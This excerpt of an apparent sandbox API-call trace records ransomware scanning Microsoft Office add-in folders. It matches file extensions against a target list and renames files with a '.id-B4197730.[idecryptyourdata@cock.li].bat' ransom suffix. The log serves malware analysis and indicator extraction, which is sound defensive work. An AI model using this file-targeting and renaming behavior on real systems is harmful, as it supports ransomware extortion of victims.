(lpString=".rar") returned 4 [0171.050] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.050] lstrlenW (lpString=".bz2") returned 4 [0171.050] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.050] lstrlenW (lpString=".7z") returned 3 [0171.050] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.050] lstrlenW (lpString=".dbf") returned 4 [0171.050] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.051] lstrlenW (lpString=".1cd") returned 4 [0171.051] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.051] lstrlenW (lpString=".jpg") returned 4 [0171.051] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.051] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.051] lstrlenW (lpString="Microsoft.Mashup.Client.Excel.resources.dll") returned 43 [0171.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.055] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=65600) returned 1 [0171.055] CloseHandle (hObject=0x434) returned 1 [0171.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.excel.resources.dll")) returned 0x220 [0171.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.excel.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.055] lstrlenW (lpString=".doc") returned 4 [0171.055] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.055] lstrlenW (lpString=".docx") returned 5 [0171.056] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.056] lstrlenW (lpString=".pdf") returned 4 [0171.056] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.056] lstrlenW (lpString=".xls") returned 4 [0171.056] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.056] lstrlenW (lpString=".xlsx") returned 5 [0171.056] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.056] lstrlenW (lpString=".ppt") returned 4 [0171.056] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.056] lstrlenW (lpString=".zip") returned 4 [0171.056] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.056] lstrlenW (lpString=".rar") returned 4 [0171.056] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.056] lstrlenW (lpString=".bz2") returned 4 [0171.056] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.056] lstrlenW (lpString=".7z") returned 3 [0171.056] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.057] lstrlenW (lpString=".dbf") returned 4 [0171.057] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.057] lstrlenW (lpString=".1cd") returned 4 [0171.057] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.057] lstrlenW (lpString=".jpg") returned 4 [0171.057] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.057] lstrlenW (lpString=".doc") returned 4 [0171.057] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.057] lstrlenW (lpString=".docx") returned 5 [0171.057] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.057] lstrlenW (lpString=".pdf") returned 4 [0171.057] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.057] lstrlenW (lpString=".xls") returned 4 [0171.057] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.057] lstrlenW (lpString=".xlsx") returned 5 [0171.057] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.057] lstrlenW (lpString=".ppt") returned 4 [0171.057] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.058] lstrlenW (lpString=".zip") returned 4 [0171.058] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.058] lstrlenW (lpString=".rar") returned 4 [0171.058] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.058] lstrlenW (lpString=".bz2") returned 4 [0171.058] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.058] lstrlenW (lpString=".7z") returned 3 [0171.058] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.058] lstrlenW (lpString=".dbf") returned 4 [0171.058] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.058] lstrlenW (lpString=".1cd") returned 4 [0171.058] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.058] lstrlenW (lpString=".jpg") returned 4 [0171.058] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.058] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.059] lstrlenW (lpString="Microsoft.Mashup.Client.Windows.resources.dll") returned 45 [0171.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.060] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=170664) returned 1 [0171.060] CloseHandle (hObject=0x434) returned 1 [0171.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.windows.resources.dll")) returned 0x220 [0171.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.windows.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.061] lstrlenW (lpString=".doc") returned 4 [0171.061] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.061] lstrlenW (lpString=".docx") returned 5 [0171.061] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.061] lstrlenW (lpString=".pdf") returned 4 [0171.061] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.061] lstrlenW (lpString=".xls") returned 4 [0171.061] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.061] lstrlenW (lpString=".xlsx") returned 5 [0171.062] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.062] lstrlenW (lpString=".ppt") returned 4 [0171.062] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.062] lstrlenW (lpString=".zip") returned 4 [0171.062] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.062] lstrlenW (lpString=".rar") returned 4 [0171.062] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.062] lstrlenW (lpString=".bz2") returned 4 [0171.062] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.062] lstrlenW (lpString=".7z") returned 3 [0171.062] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.062] lstrlenW (lpString=".dbf") returned 4 [0171.062] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.669] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.669] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\PowerViewRes.es.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\powerviewres.es.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.670] CloseHandle (hObject=0x378) returned 1 [0173.089] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.089] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\PowerViewRes.ja.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\powerviewres.ja.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.090] CloseHandle (hObject=0x378) returned 1 [0173.105] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.105] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\PowerViewRes.kk.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\powerviewres.kk.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.105] CloseHandle (hObject=0x378) returned 1 [0173.112] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.112] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\PowerViewRes.ko.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\powerviewres.ko.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.112] CloseHandle (hObject=0x378) returned 1 [0173.120] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.120] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\PowerViewRes.lt.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\powerviewres.lt.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.120] CloseHandle (hObject=0x378) returned 1 [0173.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.ReportingServices.ProgressiveProcessing.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reportingservices.progressiveprocessing.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.ReportingServices.ProgressiveProcessing.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reportingservices.progressiveprocessing.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0173.471] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.472] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\PowerViewRes.ms.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\powerviewres.ms.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.472] CloseHandle (hObject=0x37c) returned 1 [0173.485] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.485] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\PowerViewRes.nl.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\powerviewres.nl.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.486] CloseHandle (hObject=0x37c) returned 1 [0173.494] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.494] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\PowerViewRes.no.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\powerviewres.no.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.495] CloseHandle (hObject=0x37c) returned 1 [0173.501] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.501] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\PowerViewRes.pl.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\powerviewres.pl.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.501] CloseHandle (hObject=0x37c) returned 1 [0174.506] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0174.522] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.316] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.329] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.339] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.354] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lt\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lt\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel 